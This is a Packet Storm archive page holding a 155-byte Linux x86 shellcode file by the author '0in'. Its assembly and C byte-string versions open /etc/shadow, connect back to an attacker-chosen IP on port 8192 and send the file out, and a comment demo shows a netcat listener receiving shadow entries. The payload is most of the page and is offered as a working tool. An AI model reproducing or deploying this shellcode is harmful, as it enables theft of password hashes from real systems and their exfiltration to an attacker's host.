what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

backsendexit.txt

backsendexit.txt
Posted Aug 18, 2008
Authored by 0in | Site dark-coders.4rh.eu

linux/x86 connect back.send.exit /etc/shadow 155 bytes shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 2744c9dfa6a977cd5e3a6b695d567cb0608cfef78b244ab04860e862281435ab

backsendexit.txt

Change Mirror Download
;                           (C)oDed by 0in
; Dark-Coders Group Productions
; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode]
; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<<
; Contact: 0in[dot]email[at]gmail[dot]com
; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned
; Compile:
; nasm -f elf shellcode.asm
; ld -o shellcode shellcode.o
; How it works!?
; (1st console) [root@13world]# ./shellcode
; (2nd console) 0in[~]%> nc -v -l -p 8192
; (2nd console)
;Connection from 127.0.0.1:48820
;root:[password here]:13896::::::
;bin:x:0::::::
;daemon:x:0::::::
;mail:x:0::::::
;ftp:x:0::::::
;nobody:x:0::::::
;dbus:!:13716:0:99999:7:::
;zer0in:[password here]:13716:0:99999:7:::
;avahi:!:13716:0:99999:7:::
;hal:!:13716:0:99999:7:::
;clamav:!:13735:0:99999:7:::
;fetchmail:!:13737:0:99999:7:::
;mysql:!:12072:0:99999:7:::
;postfix:!:13798:0:99999:7:::
;mpd:!:13828:0:99999:7:::
;nginx:!:13959:0:99999:7:::
;tomcat:!:14063:0:99999:7:::
;http:!:14075:0:99999:7:::
;snort:!:14075:0:99999:7:::

;The code (Assembler version):

Section .text
global _start

_start:
;open(file,O_RDONLY):
xor ebx,ebx
push byte 0x77 ;/etc/shadow
push word 0x6f64
push 0x6168732f
push 0x6374652f; ----------
mov ebx,esp ; first arg - filename
xor ax,ax
inc ax
inc ax
inc ax
inc ax
inc ax ; ax = 5 (O_RDONLY)
int 0x80
mov ebx,eax
;read(file,buff,1222):
xor ax,ax
inc ax
inc ax
inc ax ; syscall id = 3
mov dx,1222 ; size to read
push esp
mov ecx,[esp] ; memory
int 0x80
mov esi,eax ; file to ESI
;socket(PF_INET,SOCK_STREAM,IPPROTO_IP)
xor ebx,ebx
push ebx ;0 ; 3rd arg
inc ebx
push ebx ;1 ; 2nd arg
inc ebx
push ebx ;2 ; 1st arg
;socketcall()
mov ax,1666 ;--------------
sub ax,1564 ;--------------
xor bx,bx ; socket() call id
inc bx ;- - - - - - - - -
mov ecx,esp ; socket()
int 0x80 ; do it!
pop ebx; clear mem
;connect(eax,struct server,16)
;16 - sizeof struct sockaddr
mov edx, eax
xor ebx,ebx
xor ebx,ebx ; ebx = 0 - IP=0.0.0.0 (set EBX to ur IP)
push ebx
mov bx,1666 ; definition of struct sockaddr
sub bx,1634 ;we cant stay 0x00 here (8192 PORT)
push bx
mov al, 2 ;
push ax
mov ecx, esp
mov al, 16
push eax
push ecx
push edx
mov al, 102
mov bx,1666
sub bx,1663 ;---------------------------------
mov ecx, esp
int 0x80 ; call connect
mov ebx,eax ; socket to ebx
; Ok! so...
; Lets write file to server and go down!
;write(socket,file,1222)
pop ebx
mov ax,1666
sub ax,1662
push esi
mov dx,16666
sub dx,15444
int 0x80
;exit(1) :
xor eax,eax ;----------
inc eax
mov ebx,eax ;----------
int 0x80 ; do it!
;C:
; #include <stdio.h>
; char shellcode[]="\x31\xdb"
; "\x6a\x77"
; "\x66\x68\x64\x6f"
; "\x68\x2f\x73\x68\x61"
; "\x68\x2f\x65\x74\x63"
; "\x89\xe3"
; "\x66\x31\xc0"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\xcd\x80"
; "\x89\xc3"
; "\x66\x31\xc0"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\xba\xc6\x04"
; "\x54"
; "\x8b\x0c\x24"
; "\xcd\x80"
; "\x89\xc6"
; "\x31\xdb"
; "\x53"
; "\x43"
; "\x53"
; "\x43"
; "\x53"
; "\x66\xb8\x82\x06"
; "\x66\x2d\x1c\x06"
; "\x66\x31\xdb"
; "\x66\x43"
; "\x89\xe1"
; "\xcd\x80"
; "\x5b"
; "\x89\xc2"
; "\x31\xdb"
; "\x53"
; "\x66\xbb\x82\x06"
; "\x66\x81\xeb\x62\x06"
; "\x66\x53"
; "\xb0\x02"
; "\x66\x50"
; "\x89\xe1"
; "\xb0\x10"
; "\x50"
; "\x51"
; "\x52"
; "\xb0\x66"
; "\x66\xbb\x82\x06"
; "\x66\x81\xeb\x7f\x06"
; "\x89\xe1"
; "\xcd\x80"
; "\x89\xc3"
; "\x5b"
; "\x66\xb8\x82\x06"
; "\x66\x2d\x7e\x06"
; "\x56"
; "\x66\xba\x1a\x41"
; "\x66\x81\xea\x54\x3c"
; "\xcd\x80"
; "\x31\xc0"
; "\x40"
; "\x89\xc3"
; "\xcd\x80";
; int main(int argc, char **argv)
; {
; int *ret;
; ret = (int *)&ret + 2;
; (*ret) = (int) shellcode;
; }


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close